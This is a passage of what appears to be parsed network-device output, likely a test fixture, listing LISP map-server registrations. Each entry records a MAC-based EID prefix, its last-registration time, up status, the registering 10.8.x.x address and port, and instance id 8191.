"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00b1.e3ff.cddd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.cde6/48": {
"last_register": "11:57:10",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.cd17/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.ce10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.cfc0/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.cfc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.cfe1/48": {
"last_register": "04:59:58",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d0bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d095/48": {
"last_register": "07:01:35",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00b1.e3ff.d1d0/48": {
"last_register": "08:20:24",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.d1d9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d25a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d3bc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.d395/48": {
"last_register": "01:08:56",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.d39b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00b1.e3ff.d43d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d440/48": {
"last_register": "01:35:56",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d467/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.d48b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d716/48": {
"last_register": "00:10:08",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d719/48": {
"last_register": "07:29:42",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00b1.e3ff.d72e/48": {
"last_register": "16:20:11",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d863/48": {
"last_register": "00:27:59",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d8a8/48": {
"last_register": "02:31:29",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d9c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00b1.e3ff.d9c5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00b1.e3ff.d9c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00b1.e3ff.d9ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00b1.e3ff.d9d1/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d9f2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00b1.e3ff.d9fe/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d911/48": {
"last_register": "00:10:31",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d929/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00b1.e3ff.d92f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.d938/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00b1.e3ff.d93e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00b1.e3ff.d956/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.d98f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00b1.e3ff.d995/48": {
"last_register": "00:47:35",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00b1.e3ff.d998/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00b1.e3ff.575a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00b1.e3ff.72c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00bf.77ff.c396/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00bf.77ff.2829/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"00c1.64ff.a3af/48": {
"last_register": "1d04h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00c1.64ff.6a7a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00c1.64ff.ba27/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00c1.b1ff.ac3e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00c8.8bff.4ac7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"00ca.e5ff.bdc9/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00ca.e5ff.c151/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00ca.e5ff.c155/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00ca.e5ff.c195/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00ca.e5ff.c1ad/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00ca.e5ff.c1b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00ca.e5ff.1c46/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00cc.fcff.3be1/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.5769/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.98a5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.98ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.98b7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.98ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00cc.fcff.9827/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.9857/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.985d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.9866/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.986c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.987b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.987e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.9887/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.99b9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00cc.fcff.99d1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.99e3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.99ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.99f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.99f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.99fb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.991d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00cc.fcff.9920/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.993b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.9941/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.9953/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.9a07/48": {
"last_register": "1w6d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"00cc.fcff.9f77/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00cc.fcff.a0f7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.a1ea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00cc.fcff.a106/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00cc.fcff.a256/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a286/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a289/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.a3a6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a3c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
"00cc.fcff.a3ca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a3cd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a3df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a3f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.a3fa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a40f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a472/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00cc.fcff.a487/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a48a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a598/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a5aa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.a5c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"00cc.fcff.a5da/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a5ef/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"00cc.fcff.a505/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a50b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"00cc.fcff.a6eb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a628/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a646/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a658/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a65b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a682/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00cc.fcff.a694/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00cc.fcff.a7e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"00cc.fcff.a703/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a70c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00cc.fcff.a72d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a730/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a73c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.a75d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"00cc.fcff.a778/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"00cc.fcff.a793/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a8a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a826/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a96d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.a98e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.acf4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.ad00/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00cc.fcff.b44b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00cc.fcff.dd58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00cc.fcff.dea8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"00cc.fcff.e853/48": {
"last_register": "01:13:00",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"00cc.fcff.f141/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00cc.fcff.f3ba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00cc.fcff.f79b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.fd98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00cc.fcff.fec4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00cc.fcff.fe10/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00cc.fcff.0060/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"00cc.fcff.036c/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00cc.fcff.0f84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"00cc.fcff.110a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00cc.fcff.1113/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.12ae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00cc.fcff.12d5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00cc.fcff.125d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.17eb/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.187e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1953/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00cc.fcff.1ad9/48": {
"last_register": "09:49:46",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1adf/48": {
"last_register": "09:35:59",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a2b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"00cc.fcff.1a3a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00cc.fcff.1a4c/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a4f/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a73/48": {
"last_register": "00:40:53",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a82/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"00cc.fcff.1a88/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a8b/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1a94/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1b48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00cc.fcff.1b99/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1c9e/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1caa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00cc.fcff.1cf2/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.1cf5/48": {
"last_register": "15:09:12",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"00cc.fcff.2424/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00cc.fcff.2b3e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"00cc.fcff.4272/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"00eb.d5ff.0e1e/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00eb.d5ff.1661/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00fd.22ff.46eb/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00fd.22ff.60af/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"00fe.c8ff.0734/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00fe.c8ff.075e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00fe.c8ff.228c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"00fe.c8ff.23bd/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"00fe.c8ff.23ed/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"00fe.c8ff.3ead/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"00fe.c8ff.77e0/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"00fe.c8ff.b0ec/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"00fe.c8ff.c94d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"00fe.c8ff.ca3d/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"00fe.c8ff.dad8/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"00fe.c8ff.dcc0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"042a.e2ff.2b33/48": {
"last_register": "1d04h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"042a.e2ff.28cf/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"042a.e2ff.2c40/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"042a.e2ff.c454/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0462.73ff.1ce0/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0462.73ff.1cea/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"0462.73ff.1cfd/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0462.73ff.60fa/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"0462.73ff.60fc/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"0462.73ff.313c/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04c5.a4ff.ee8a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"04da.d2ff.65a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"04eb.40ff.c21e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"04eb.40ff.c8d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"04eb.40ff.df31/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.e44a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"04eb.40ff.e9ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"04eb.40ff.3860/48": {
"last_register": "10:35:34",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"04eb.40ff.6e4e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"04eb.40ff.73d6/48": {
"last_register": "2w1d",
"up": "yes#",
